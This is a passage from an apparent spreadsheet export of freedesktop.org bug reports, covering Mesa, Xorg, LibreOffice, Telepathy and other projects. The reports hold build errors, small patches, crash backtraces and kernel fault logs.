/usr/ccs/bin/as:  line 1564: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1565: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1565: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1566: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1566: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1567: error: expression must evaluate to a nonrelocatable (absolute) value
/usr/ccs/bin/as:  line 1567: error: expression must evaluate to a nonrelocatable (absolute) value
make[4]: *** [sparc/glapi_sparc.o] Error 1
make[4]: Leaving directory `/remote/lithop4/egger/src/solaris/Mesa-7.0/src/mesa'
make[3]: *** [default] Error 2
make[3]: Leaving directory `/remote/lithop4/egger/src/solaris/Mesa-7.0/src/mesa'
make[2]: *** [subdirs] Error 1
make[2]: Leaving directory `/remote/lithop4/egger/src/solaris/Mesa-7.0/src'
make[1]: *** [default] Error 1
make[1]: Leaving directory `/remote/lithop4/egger/src/solaris/Mesa-7.0'
make: *** [sunos5-64-gcc] Error 2
I used gcc 4.0.2 and gcc 4.2.1
gcc -v
Using built-in specs.
Target: sparc-sun-solaris2.8
Configured with: ../configure --prefix=/opt/gcc-4.0.2 --with-as=/usr/ccs/bin/as --with-ld=/usr/ccs/bin/ld --disable-nls --disable-libgcj --enable-languages=cc++
Thread model: posix
gcc version 4.0.2
gcc -v
 gcc -v
Using built-in specs.
Target: sparc-sun-solaris2.9
Configured with: ../configure --prefix=/global/cust_apps_seg2/seg-tools/development/solaris/gcc-4.2.1 --with-as=/usr/ccs/bin/as --with-ld=/usr/ccs/bin/ld --disable-nls --disable-libgcj --enable-languages=cc++
Thread model: posix
gcc version 4.2.1
uname -a
SunOS lenzcs9 5.9 Generic_118558-22 sun4u sparc SUNWSun-Blade-1500
as -V
as: Sun WorkShop 6 update 2 Compiler Common 6.2 Solaris_9_CBE 2001/04/02
as: error: no input filename given
usage: as [-V] [-Q{yn}] [-f[O][if]#] [-q] [-s]
          [-S] [-K {picPIC}] [-o objfile] [-L] [-T]
          [-P [[-Ipath] [-Dname] [-Dname=def] [-Uname]]...]
          [-m [-Ympath]] [-n] [-ul] [-xF] [-xarch=v7] [-xarch=v8] [-xarch=v8a] [-xarch=v8plus] [-xarch=v8plusa] [-xarch=v8plusb]  [-xarch=v9] [-xarch=v9a] [-xarch=v9b]  [-xcode={pic13pic32}] file.s...
It would be great if you could help with that error. It seems that
the assembler file has glapi_sparc.S has something problematic for the sun
assembler file.
In former times I've successfully build a Mesa version 6.2.1 (32 Bit) and a 6.4.2 (32/64 Bit). Maybe it's possible not to use the assembler file ...
Kind regards
  Roland</t>
  </si>
  <si>
    <t>spark74</t>
  </si>
  <si>
    <t>POPPLER-26532</t>
  </si>
  <si>
    <t>Not showing text in Evince</t>
  </si>
  <si>
    <t>Created attachment 33238
screenshot
The image attached shows the difference between the xpdf and poppler outputs.</t>
  </si>
  <si>
    <t>XORG-3811</t>
  </si>
  <si>
    <t>xload and memleak (GNU/kFreeBSD support)</t>
  </si>
  <si>
    <t>Fixes for xload and memleak to build on GNU/kFreeBSD.
(note: GNU/kFreeBSD has Glibc and a Linux-like /proc)
Index: programs/xload/get_load.c
===================================================================
RCS file: /cvs/xorg/xc/programs/xload/get_load.cv
retrieving revision 1.2
diff -u -r1.2 get_load.c
--- programs/xload/get_load.c   23 Apr 2004 19:54:57 -0000      1.2
+++ programs/xload/get_load.c   18 Jul 2005 19:17:46 -0000
@@ -4067 +4067 @@
 }
 #else /* not KVM_ROUTINES */
-#ifdef linux
+#if defined(linux) || (defined(__FreeBSD_kernel__) &amp;&amp; defined(__GLIBC__))
 void InitLoadPoint()
 {
Index: util/memleak/Imakefile
===================================================================
RCS file: /cvs/xorg/xc/util/memleak/Imakefilev
retrieving revision 1.2
diff -u -r1.2 Imakefile
--- util/memleak/Imakefile      23 Apr 2004 19:55:10 -0000      1.2
+++ util/memleak/Imakefile      18 Jul 2005 19:17:46 -0000
@@ -427 +427 @@
 GRA_SRCS = getreti386.c stackbottom.c
 #endif
-#ifdef LinuxArchitecture
+#if defined(LinuxArchitecture) || defined(__GLIBC__)
 #ifdef i386Architecture
 #define HasGetReturnAddress    YES
 #define TopOfStack 0xbffff800</t>
  </si>
  <si>
    <t>ACCOUNTSSERVICE-89042</t>
  </si>
  <si>
    <t>accountsservice &gt;0.37 breaks with multiple usernames for a single uid</t>
  </si>
  <si>
    <t>I have a second username tied to my account sharing the same user id so that
I can log in with a second password (which does not unlock some encrypted stuff
automatically).
This has worked fine until accountsservice-0.37. After that it broke and GDM
would not show up anymore.
AFAIK multiple username/password for the same user id are legal and they should
not confuse accountsservice.</t>
  </si>
  <si>
    <t>andrearatto_liste</t>
  </si>
  <si>
    <t>MESA-25701</t>
  </si>
  <si>
    <t>Gallium Radeon driver: undefined symbol: pf_is_depth_or_stencil</t>
  </si>
  <si>
    <t>Created attachment 32169
Patch to rename pf_is_depth_or_stencil function.
I am using the latest version of mesa from git commmit: 7855fcb63ba0594cdaee15f8579b66af651828e0  the Gallium Radeon driver fails to load with this error message: 
undefined symbol: pf_is_depth_or_stencil
I think this is due to a function rename in the most recent merge.  I have attached a patch that fixes the problem.</t>
  </si>
  <si>
    <t>MESA-94168</t>
  </si>
  <si>
    <t>Incorrect rendering when running Populous 3 on wine using DDraw-&gt;WineD3D-&gt;OpenGL wrapper [apitrace]</t>
  </si>
  <si>
    <t>There is a description of this problem on Wine's Bugzilla I'll refer to that first:
https://bugs.winehq.org/show_bug.cgi?id=40126
I did some tests and I am now inclined to believe this is a Mesa bug:
After making an apitrace and replaying it I only see incorrect rendering when using hardware rendering (Mesa Gallium3D radeonsi). When the same apitrace is replayed in software mode the rendering is correct and looks like it is supposed to.
Another user reported the exact same problem with nouveau but it works fine with the nvidia binary driver.
Apitrace: https://drive.google.com/file/d/0B6CofbZiVpM1b1RKSDNLZXdteW8/view?usp=sharing</t>
  </si>
  <si>
    <t>diegoandino</t>
  </si>
  <si>
    <t>LIBREOFFICE-32548</t>
  </si>
  <si>
    <t>[UI]Update links question is not user-friendly</t>
  </si>
  <si>
    <t>Bug forwarded from launchpad https://bugs.launchpad.net/ubuntu/+source/openoffice.org/+bug/692929
as this is present in LibreOffice too. Setting as trivial as this seems to be only a string change.
When I open a certain .odp document I get a pop-up question asking Update all links? Yes/No.
Doubtless it is an important question but what the hell does it mean? I click Yes and things seem to go OK but what am I updating? Do I really want to update *all* links? What does updating _do_ to my links? Are these hyperlinks we're talking about?
Anyhow many questions arise and you cannot get the answers to any of them. The pop-up box should contain a better question with enough information so that one can get a clue about what is going on.
The problem is with the string STR_QUERY_UPDATE_LINKS see http://opengrok.go-oo.org/search?q=STR_QUERY_UPDATE_LINKS&amp;project=libs-core for details.</t>
  </si>
  <si>
    <t>LIBREOFFICE-73021</t>
  </si>
  <si>
    <t>Calc crashes on spell check</t>
  </si>
  <si>
    <t>Problem description: Calc crashes on spell check
Steps to reproduce:
Open a spreadsheet with a misspelled word when Spell Check is invoked (F7)
and action is selected (Correct Ignore etc) by clicking corresponding button calc crashes.</t>
  </si>
  <si>
    <t>ACCOUNTSSERVICE-66214</t>
  </si>
  <si>
    <t>Clean up user classification logic</t>
  </si>
  <si>
    <t>After a discussion on IRC we decided that it might be a good idea to have a build option to control whether we want to have the complicated checks for human vs. system user or the straight-up one based solely on uid and login.defs.</t>
  </si>
  <si>
    <t>MESA-27343</t>
  </si>
  <si>
    <t>[r300g] - celestia's stars are missing with OpenGL vertex program rendering path</t>
  </si>
  <si>
    <t>I am running celestia with a Radeon 9550 (RV350) and Gallium from git. When I cycle through all celestia's different rendering path options with Ctrl-V all the stars disappear when I reach OpenGL vertex program.
The stars are also missing with the OpenGL 2.0 rendering path as are all the textures for planet Earth.</t>
  </si>
  <si>
    <t>DBUS-37852</t>
  </si>
  <si>
    <t>regression in 0.94: marshalling a GObject (as object path) fails</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; const char *
&gt; _dbus_gobject_get_path (GObject *obj)
&gt; {
&gt;   GSList *registrations
&gt;   ObjectRegistration *o
&gt; 
&gt;   registrations = g_object_get_data (obj dbus_glib_object_registrations)
but dbus_glib_object_registrations is now an ObjectExport struct not a GSList in order to fix Bug #36811.
This breaks marshalling a GObject (as its object path) which NetworkManager uses.
Bug-Debian: </t>
  </si>
  <si>
    <t>LIBREOFFICE-73149</t>
  </si>
  <si>
    <t>Add Excel 2010 functions ERF.PRECISE ERFC.PRECISE</t>
  </si>
  <si>
    <t>See meta bug 70798 for details.</t>
  </si>
  <si>
    <t>MESA-103496</t>
  </si>
  <si>
    <t>svga_screen.c:26:46: error: git_sha1.h: No such file or directory</t>
  </si>
  <si>
    <t xml:space="preserve">mesa: 05592cebd4fd (master 17.4.0-devel)
SCons build regression
  Compiling src/gallium/drivers/svga/svga_screen.c ...
src/gallium/drivers/svga/svga_screen.c:26:46: error: git_sha1.h: No such file or directory
commit 7088622e5fb506b64c906b673a9af0feb9a5ba14
Author: Eric Engestrom 
Date:   Wed Oct 25 14:04:35 2017 +0100
    buildsys: move file regeneration logic to the script itself
    Signed-off-by: Eric Engestrom 
    Reviewed-by: Jordan Justen 
    Reviewed-by: Dylan Baker </t>
  </si>
  <si>
    <t>DRI-110382</t>
  </si>
  <si>
    <t>[CI][SHARDS] igt@runner@aborted - fail - general protection fault: 0000 [#1] PREEMPT SMP NOPTI Workqueue: events azx_probe_work</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/CI_DRM_5896/shard-iclb2/igt@runner@aborted.html
Aborting.
Previous test: nothing
Next test: gem_exec_basic (basic-render)
Kernel badly tainted (0x2a0) (check dmesg for details):
	(0x20) TAINT_BAD_PAGE: Bad page reference or an unexpected page flags.
	(0x80) TAINT_DIE: Kernel has died - BUG/OOPS.
	(0x200) TAINT_WARN: WARN_ON has happened.
[   11.837706] general protection fault: 0000 [#1] PREEMPT SMP NOPTI
[   11.837755] CPU: 4 PID: 190 Comm: kworker/4:3 Not tainted 5.1.0-rc4-CI-CI_DRM_5896+ #1
[   11.837788] Hardware name: Intel Corporation Ice Lake Client Platform/IceLake U DDR4 SODIMM PD RVP BIOS ICLSFWR1.R00.3087.A00.1902250334 02/25/2019
[   11.837843] Workqueue: events azx_probe_work [snd_hda_intel]
[   11.837869] RIP: 0010:kobject_uevent_env+0x38/0x810
[   11.837890] Code: 53 49 89 d5 48 89 c3 48 83 ec 38 4c 8b 24 c5 c0 88 ef 81 0f 1f 44 00 00 4c 89 f0 eb 0d 48 8b 40 18 48 85 c0 0f 84 27 01 00 00  8b 78 20 4d 85 ff 74 ea 41 f6 46 3c 10 0f 85 f9 00 00 00 49 8b
[   11.837957] RSP: 0018:ffffc9000144bd18 EFLAGS: 00010296
[   11.837980] RAX: 6b6b6b6b6b6b6b6b RBX: 0000000000000002 RCX: 0000000000000000
[   11.838008] RDX: 0000000000000000 RSI: 0000000000000002 RDI: 6b6b6b6b6b6b6b6b
[   11.838036] RBP: ffff88848250b3f8 R08: 0000000085e480ea R09: 0000000000000001
[   11.838063] R10: 0000000000000000 R11: ffff888499ee48b8 R12: ffffffff820df667
[   11.839071] R13: 0000000000000000 R14: 6b6b6b6b6b6b6b6b R15: ffff88849507df00
[   11.840027] FS:  0000000000000000(0000) GS:ffff88849ff00000(0000) knlGS:0000000000000000
[   11.840992] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   11.841951] CR2: 0000556b60348c78 CR3: 0000000005214004 CR4: 0000000000760ee0
[   11.842915] PKRU: 55555554
[   11.843882] Call Trace:
[   11.844846]  ? add_widget_node+0x68/0xa0 [snd_hda_core]
[   11.845330] [drm:i915_audio_component_get_eld [i915]] Not valid for port B
[   11.845813]  widget_tree_create+0xf6/0x110 [snd_hda_core]
[   11.846800] [drm:i915_audio_component_get_eld [i915]] Not valid for port B
[   11.847717]  hda_widget_sysfs_init+0x1a/0x40 [snd_hda_core]
[   11.847720]  snd_hdac_device_register+0x19/0x40 [snd_hda_core]
[   11.848782] [drm:i915_audio_component_get_eld [i915]] Not valid for port B
[   11.849720]  snd_hda_codec_configure+0x39/0x160 [snd_hda_codec]
[   11.849724]  azx_codec_configure+0x2a/0x60 [snd_hda_codec]
[   11.850981] [drm:i915_audio_component_get_eld [i915]] Not valid for port C
[   11.851936]  azx_probe_work+0x42e/0x7e0 [snd_hda_intel]
[   11.852973] [drm:i915_audio_component_get_eld [i915]] Not valid for port C
[   11.853928]  process_one_work+0x245/0x610
[   11.855224] [drm:i915_audio_component_get_eld [i915]] Not valid for port C
[   11.856202]  worker_thread+0x37/0x380
[   11.856204]  ? process_one_work+0x610/0x610
[   11.857129] [drm:i915_audio_component_get_eld [i915]] Not valid for port D
[   11.858091]  kthread+0x119/0x130
[   11.858092]  ? kthread_park+0x80/0x80
[   11.858095]  ret_from_fork+0x24/0x50
[   11.858999] [drm:i915_audio_component_get_eld [i915]] Not valid for port D
[   11.859975] Modules linked in: snd_hda_codec_hdmi(+) snd_hda_codec_realtek(+) snd_hda_codec_generic x86_pkg_temp_thermal coretemp mei_hdcp crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec snd_hwdep ghash_clmulni_intel snd_hda_core cdc_ether usbnet e1000e snd_pcm mii ptp pps_core mei_me mei i915 prime_numbers
[   11.860861] [drm:i915_audio_component_get_eld [i915]] Not valid for port D
[   11.862139] ---[ end trace bf38e6abac39589f ]---</t>
  </si>
  <si>
    <t>MESA-47126</t>
  </si>
  <si>
    <t>tests/fbo/fbo-array.c:109: create_array_fbo: Assertion `glGetError() == 0' failed.</t>
  </si>
  <si>
    <t>Run piglit fbo-array on Mesa swrast or softpipe.
$ ./bin/fbo-array -auto
Mesa: Initializing x86-64 optimizations
Mesa: User error: GL_INVALID_VALUE in glFramebufferTextureLayerEXT(level)
fbo-array: fbo/fbo-array.c:109: create_array_fbo: Assertion `glGetError() == 0' failed.
Aborted (core dumped)
(gdb) bt
#0  0x00007f0137b5a445 in __GI_raise (sig=) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
#1  0x00007f0137b5dbab in __GI_abort () at abort.c:91
#2  0x00007f0137b5310e in __assert_fail_base (fmt= assertion=0x4573a0 glGetError() == 0 
    file=0x457378 piglit/tests/fbo/fbo-array.c line= function=) at assert.c:94
#3  0x00007f0137b531b2 in __GI___assert_fail (assertion=0x4573a0 glGetError() == 0 
    file=0x457378 piglit/tests/fbo/fbo-array.c line=109 function=0x457400 create_array_fbo) at assert.c:103
#4  0x000000000042ac00 in create_array_fbo () at piglit/tests/fbo/fbo-array.c:109
#5  0x000000000042af2e in piglit_display () at piglit/tests/fbo/fbo-array.c:190
#6  0x000000000042b729 in display () at piglit/tests/util/piglit-framework.c:56
#7  0x00007f0138233220 in fghRedrawWindow (window=0x108d460) at freeglut_main.c:210
#8  fghcbDisplayWindow (window=0x108d460 enumerator=0x7ffffa557680) at freeglut_main.c:227
#9  0x00007f0138236939 in fgEnumWindows (enumCallback=0x7f0138233120  enumerator=0x7ffffa557680)
    at freeglut_structure.c:394
#10 0x00007f013823365a in fghDisplayAll () at freeglut_main.c:249
#11 glutMainLoopEvent () at freeglut_main.c:1450
#12 0x00007f0138233f0e in glutMainLoop () at freeglut_main.c:1498
#13 0x000000000042be9b in main (argc=1 argv=0x7ffffa5579d8) at piglit/tests/util/piglit-framework.c:304
(gdb) frame 4
#4  0x000000000042ac00 in create_array_fbo () at piglit/tests/fbo/fbo-array.c:109
109			assert(glGetError() == 0)</t>
  </si>
  <si>
    <t>TELEPATHY-16774</t>
  </si>
  <si>
    <t>TpConnectionManager idle callback not cancelled on destroy</t>
  </si>
  <si>
    <t>As reported by iain^ on IRC TpConnectionManager fails to cancel an idle when destroyed resulting in this crash.
#include 
#include 
DBusGConnection *conn
TpDBusDaemon *tp_conn
static void
list_cm (TpConnectionManager * const *cms
         gsize                        n_cms
         const GError                *error
         gpointer                     userdata
         GObject                     *weak_object)
{
        int i
        g_print (Got %d connection managers\n n_cms)
        for (i = 0 i &lt; n_cms i++) {
                TpConnectionManager *cm = cms[i]
                g_print ([%d] %s\n i + 1 cm-&gt;name)
                if (cm-&gt;info_source &gt; TP_CM_INFO_SOURCE_NONE) {
                        int j
                        for (j = 0 cm-&gt;protocols[j] j++) {
                                const TpConnectionManagerProtocol *p = cm-&gt;protocols[j]
                                g_print (   (%d) %s\n j + 1 p-&gt;name)
                        }
                }
        }
}
int
main (int    argc
      char **argv)
{
        GMainLoop *mainloop
        g_type_init ()
        conn = tp_get_bus ()
        tp_conn = tp_dbus_daemon_new (conn)
        tp_list_connection_managers (tp_conn list_cm NULL NULL NULL)
        mainloop = g_main_loop_new (NULL FALSE)
        g_main_loop_run (mainloop)
}
-----
# ./tp-test
Got 2 connection managers
[1] gabble
[2] sofiasip
(process:13565): GLib-GObject-WARNING **: invalid uninstantiatable type `' in cast to `TpConnectionManager'
Segmentation fault
Program received signal SIGSEGV Segmentation fault.
0x4007bb5e in tp_connection_manager_idle_read_manager_file (data=0x8058808)
    at connection-manager.c:808
808	  if (self-&gt;priv-&gt;protocols == NULL &amp;&amp; self-&gt;priv-&gt;manager_file != NULL
(gdb) bt
#0  0x4007bb5e in tp_connection_manager_idle_read_manager_file (data=0x8058808)
    at connection-manager.c:808
#1  0x4027ddf1 in g_idle_dispatch (source=0x80590c0 
    callback=0x403179c8  user_data=0x8058808)
    at gmain.c:4171
#2  0x4027f9fc in IA__g_main_context_dispatch (context=0x8051668)
    at gmain.c:2066
#3  0x40282e5f in g_main_context_iterate (context=0x8051668 block=1 
    dispatch=1 self=0x8053000) at gmain.c:2699
#4  0x40283209 in IA__g_main_loop_run (loop=0x8051510) at gmain.c:2922
#5  0x080487a3 in main () at main.c:48</t>
  </si>
  <si>
    <t>CAIRO-9863</t>
  </si>
  <si>
    <t>configure cannot find libpng without pkg-config even with libpng_* overrides</t>
  </si>
  <si>
    <t>With an old version of libpng that does not support pkg-config configure cannot find libpng even if the png_CFLAGS and png_LIBS overrides are used.
If both png_CFLAGS and png_LIBS are set configure should ignore pkg-config and just do a compile-and-link test. Currently it ignores png_CFLAGS and png_LIBS (does not compile anything to test) contrary to what configure --help says.
On another hand if the pkgconfig-enabled version of libpng is mandatory due to new functions or security fixes configure still should report that in the error message instead of just saying not found.</t>
  </si>
  <si>
    <t>ambrose.li</t>
  </si>
  <si>
    <t>MESA-92124</t>
  </si>
  <si>
    <t>shader_query.cpp:841:34: error: â€˜strndupâ€™ was not declared in this scope</t>
  </si>
  <si>
    <t>mesa: 1e97b41893a4f53a71ee141a5e8a046fed7b49cd (master 11.1.0-devel)
SCons MinGW build error
  Compiling src/mesa/main/shader_query.cpp ...
src/mesa/main/shader_query.cpp: In function â€˜char* get_top_level_name(const char*)â€™:
src/mesa/main/shader_query.cpp:841:34: error: â€˜strndupâ€™ was not declared in this scope
    return strndup(name name_size)
                                  ^</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-92197</t>
  </si>
  <si>
    <t>Fix invalid octal escape</t>
  </si>
  <si>
    <t>Test file colormapped.tga included</t>
  </si>
  <si>
    <t>otte</t>
  </si>
  <si>
    <t>SHARED-MIME-INFO-18887</t>
  </si>
  <si>
    <t>Add support for cb7 files</t>
  </si>
  <si>
    <t>cb7 is a comic book archive similar to cbr and cbz. cbz format uses zip for compression cbr uses rar and cb7 uses 7-zip.
The mime types for cbr and cbz are application/x-cbr and application/x-cbz respectively. So I think that the mime type for cb7 should be application/x-cb7.</t>
  </si>
  <si>
    <t>juanj.marin</t>
  </si>
  <si>
    <t>MESA-21227</t>
  </si>
  <si>
    <t>glCopyTexImage2D fails for wide textures (intel_tex_image.c:355: intelTexImage: Assertion `texImage-&gt;RowStride == postConvWidth' failed.)</t>
  </si>
  <si>
    <t>I'm using a debian system if you think some more details can help please let me know.
Linux matrix 2.6.29-1-686 #1 SMP Sat Apr 4 17:36:29 UTC 2009 i686 GNU/Linux
ii  libgl1-mesa-dri          7.4-2                    A free implementation of the OpenGL API -- DRI modules
(gdb) run
Starting program: el.x86.linux.bin 
[Thread debugging using libthread_db enabled]
[New Thread 0xb419bb90 (LWP 6053)]
[New Thread 0xb3999b90 (LWP 6058)]
[New Thread 0xb29f4b90 (LWP 6070)]
[Thread 0xb3999b90 (LWP 6058) exited]
do_wait: drmWaitVBlank returned -1 IRQs don't seem to be working correctly.
Try adjusting the vblank_mode configuration parameter.
[New Thread 0xb21f3b90 (LWP 6086)]
el.x86.linux.bin: intel_tex_image.c:355: intelTexImage: Assertion `texImage-&gt;RowStride == postConvWidth' failed.
Program received signal SIGABRT Aborted.
0xb7fe1424 in __kernel_vsyscall ()
(gdb) back
#0  0xb7fe1424 in __kernel_vsyscall ()
#1  0xb78ef640 in raise () from /lib/i686/cmov/libc.so.6
#2  0xb78f1008 in abort () from /lib/i686/cmov/libc.so.6
#3  0xb78e85ce in __assert_fail () from /lib/i686/cmov/libc.so.6
#4  0xb6f3c2df in ?? () from /usr/lib/dri/i915_dri.so
#5  0xb70fcca8 in ?? () from /usr/lib/dri/i915_dri.so
#6  0xb70fcb4d in ?? () from /usr/lib/dri/i915_dri.so
#7  0x00000163 in ?? ()
#8  0xb70fcd49 in ?? () from /usr/lib/dri/i915_dri.so
#9  0x00000000 in ?? ()
(gdb)</t>
  </si>
  <si>
    <t>ladrilho</t>
  </si>
  <si>
    <t>CAIROMM-84030</t>
  </si>
  <si>
    <t>Update and Overhaul the Visual Studio 2008 and 2010 Projects</t>
  </si>
  <si>
    <t>Hi
The Visual Studio 2008 projects have gotten a bit out of date and I thought it might be good that we overhaul it a bit as there are many items which IMHO can be consolidated into property sheets so that future maintenance of these items can be eased a bit.
For the Visual Studio 2010 projects although David updated it not too long ago I thought it might be also good to give it a makeover with the property sheets treatment as well.
I will attach patches for these in a bit...</t>
  </si>
  <si>
    <t>UDISKS-73736</t>
  </si>
  <si>
    <t>UDisks2 should prefer /dev/VG/LV over /dev/mapper/VG-LV.</t>
  </si>
  <si>
    <t>Created attachment 92273
Prefer /dev/VG/LV for LVM2 volumes.
At least that's what LVM2 is saying:
https://www.redhat.com/archives/linux-lvm/2014-January/msg00013.html</t>
  </si>
  <si>
    <t>TELEPATHY-29090</t>
  </si>
  <si>
    <t>Add support to filter accounts by RequestableChannelClasses</t>
  </si>
  <si>
    <t>tp-qt4 should support filtering accounts by RCC so we can do things like Give me all jabber accounts that support audio calls.</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-68606</t>
  </si>
  <si>
    <t>Missing backslash/bar mapping on us international variants</t>
  </si>
  <si>
    <t>Backslash/bar mapping is missing on us international variants. I'm going to attach a patch against current git head.</t>
  </si>
  <si>
    <t>XORG-7930</t>
  </si>
  <si>
    <t>i810 doesn't compile without DRI</t>
  </si>
  <si>
    <t>Hi  When XF86DRI is not defined there are several compiling error here is a patch.  Samuel</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-8385</t>
  </si>
  <si>
    <t>Look for MacBook layouts in symbols/macintosh_vndr/</t>
  </si>
  <si>
    <t>Hi
I visited an Apple Center today and saw that in France MacBook
keyboards have a layout similar to symbols/macintosh_vndr/fr and
not symbols/fr which means that they are compatible with older
Apple laptops this seems pretty logical.  Thus the line
  $macbooks     *                       =       pc+%l%(v)
has to be deleted from rules/base.ml_s.part
Thanks.</t>
  </si>
  <si>
    <t>GEOCLUE-27895</t>
  </si>
  <si>
    <t>Backends (obsolete)</t>
  </si>
  <si>
    <t>gsmloc backend could use NetworkManager</t>
  </si>
  <si>
    <t>For most desktops where oFono isn't an option.</t>
  </si>
  <si>
    <t>TELEPATHY-30824</t>
  </si>
  <si>
    <t>Doesn't clean up properly if CM dies.</t>
  </si>
  <si>
    <t>I found that sometimes opening conversations to particular contacts would wait for MC's call to tpl's ObserveChannels implementation to time out before the channel could be dispatched. And inevitably those conversations weren't logged.
I tracked this down to a pair of issues:
â€¢ tpl only forgets about a channel if it emits Closed() which doesn't happen if I kill Gabble. If the same object path is re-used the next time I connect (without restarting tpl) then it just ignores the channel.
â€¢ If tpl chooses not to observe any channels from the list passed to ObserveChannels() it never returns from the method. This is the classic expecting-at-least-one-async-operation-when-actually-there-may-be-none bug.
Patches to follow.</t>
  </si>
  <si>
    <t>XORG-59340</t>
  </si>
  <si>
    <t>Evdev ignores SwapAxes/Invert for touch events</t>
  </si>
  <si>
    <t>SwapAxes and InvertX/Y is ignored for touch events.</t>
  </si>
  <si>
    <t>DRI-86268</t>
  </si>
  <si>
    <t>[BSW Bisected] eDP goes black after running tesdisplay</t>
  </si>
  <si>
    <t>Created attachment 109444
dmesg
==System Environment==
--------------------------
Result on -next-queued 2014-11-13  22ba72f728eaf30e63ded0c0bb0484b4bc6f92d4
Non-working platforms: BSW
==kernel==
--------------------------
origin/drm-intel-nightly: 22ba72f728eaf30e63ded0c0bb0484b4bc6f92d4  
==Bug detailed description==
-----------------------------
We run the testdisplay case with eDP screen can display correctly. 
But will goes black after all the display. And we can ssh into the machine.
Reproduce steps:
-------------------------
==Reproduce steps==
---------------------------- 
1. cd /GFX/Test/Intel-gpu-tools/intel-gpu-tools/tests
2. ./testdisplay -a</t>
  </si>
  <si>
    <t>li.l.xu</t>
  </si>
  <si>
    <t>SYSTEMD-49700</t>
  </si>
  <si>
    <t>Incorrect handling of return value of posix_fallocate()</t>
  </si>
  <si>
    <t>Created attachment 61299
Proposed solution
According to the man pages of posix_fallocate it returns zero on
success or an error number on failure however  errno is not set
on failure. If the kernel or a library other than glibc does not
support the function for example EOPNOTSUPP will be returned and
the error will not be handled properly with original code.
Please see proposed solution attached.</t>
  </si>
  <si>
    <t>guillermo.vidal</t>
  </si>
  <si>
    <t>MESA-107878</t>
  </si>
  <si>
    <t>Artifacting Hair on Overwatch vega56</t>
  </si>
  <si>
    <t>Hair of most characters in overwatch has blocky artefacts on latest mesa-git (18.3) and llvm-svn (8)
This is using dxvk and wine-staging with sync and gallium nine patches.</t>
  </si>
  <si>
    <t>coolo1mc</t>
  </si>
  <si>
    <t>FARSTREAM-89287</t>
  </si>
  <si>
    <t>Add ability to build static GST/FS plugins</t>
  </si>
  <si>
    <t>In order to use Farstream on Android and iOS we need to be able to build and link it statically.</t>
  </si>
  <si>
    <t>PULSEAUDIO-78564</t>
  </si>
  <si>
    <t>Untranslatable string due to wrong usage of gettext</t>
  </si>
  <si>
    <t>Untranslatable string due to wrong usage of gettext here in src/daemon/main.c line 271:
    pa_log_info(_(Successfully changed user to \ PA_SYSTEM_USER \.))
Because Gettext can only extract string constants and cannot parse C preprocessor variables it extracts only the first part - Successfully changed user to \. Then because the whole string along with PA_SYSTEM_USER etc is passed into the _() call translation for that is not found and the string is never translated into any language.
Solution: pass PA_SYSTEM_USER as %s like this:
    pa_log_info(_(Successfully changed user to \%s\.) PA_SYSTEM_USER)</t>
  </si>
  <si>
    <t>MESA-108814</t>
  </si>
  <si>
    <t>[radeonsi] page fault umr dump</t>
  </si>
  <si>
    <t>I tried it on two computers.
Linux (none) 4.20.0-rc1+ #8 SMP PREEMPT Tue Nov 20 00:24:49 CET 2018 x86_64 AMD Athlon PRO 200GE w/ Radeon Vega Graphics AuthenticAMD GNU/Linux
Extended renderer info (GLX_MESA_query_renderer):
    Vendor: X.Org (0x1002)
    Device: AMD RAVEN (DRM 3.27.0 4.20.0-rc1+ LLVM 7.0.0) (0x15dd)
    Version: 18.2.5
[   80.221112] amdgpu 0000:38:00.0: [gfxhub] VMC page fault (src_id:0 ring:32 vmid:2 pasid:32768 for process roles pid 358 thread roles:cs0 pid 359)
[   80.221116] amdgpu 0000:38:00.0:   in page starting at address 0x0000800000a94000 from 27
[   80.221118] amdgpu 0000:38:00.0: VM_L2_PROTECTION_FAULT_STATUS:0x00240C40
Other computer.
Linux amd1.blue.org 4.19.2 #1 SMP PREEMPT Tue Nov 20 21:41:52 CET 2018 x86_64 AMD Ryzen 7 1700X Eight-Core Processor AuthenticAMD GNU/Linux
Extended renderer info (GLX_MESA_query_renderer):
    Vendor: X.Org (0x1002)
    Device: AMD Radeon (TM) RX 460 Graphics (POLARIS11 DRM 3.27.0 4.19.2 LLVM 7.0.0) (0x67ef)
    Version: 18.2.5
[ 1253.329906] amdgpu 0000:0e:00.0: GPU fault detected: 147 0x09004802 for process roles pid 1119 thread roles:cs0 pid 1120
[ 1253.329910] amdgpu 0000:0e:00.0:   VM_CONTEXT1_PROTECTION_FAULT_ADDR   0x0000EB20
[ 1253.329911] amdgpu 0000:0e:00.0:   VM_CONTEXT1_PROTECTION_FAULT_STATUS 0x0C048002
[ 1253.329914] amdgpu 0000:0e:00.0: VM fault (0x02 vmid 6 pasid 32769) at page 60192 read from 'TC0' (0x54433000) (72)
Is this llvm or mesa issue ?
I also tried older kernel 4.16 same thing.
What reports do you need ?</t>
  </si>
  <si>
    <t>domen.stangar</t>
  </si>
  <si>
    <t>PACKAGEKIT-89900</t>
  </si>
  <si>
    <t>unclear how to run with --verbose by default</t>
  </si>
  <si>
    <t>I have set myself a noble goal of making sure that packagekit works well for end users. In order to make finding and debugging packagekit issues easier I want to run packagekitd with --verbose option by default. However I fail to find out how to do that.
When I look into /etc/PackageKit/PackageKit.conf there's no option for increased verbosity.
In the Reporting Bugs and FAQ sections on the web there's no info either:
http://www.freedesktop.org/software/PackageKit/pk-bugs.html
http://www.freedesktop.org/software/PackageKit/pk-faq.html
If I override the existing systemd unit file in /etc and add --verbose as a default argument packagekit doesn't start at all (I have no idea why):
$ sudo systemctl stop packagekit.service
$ sudo cp /usr/lib/systemd/system/packagekit.service /etc/systemd/system
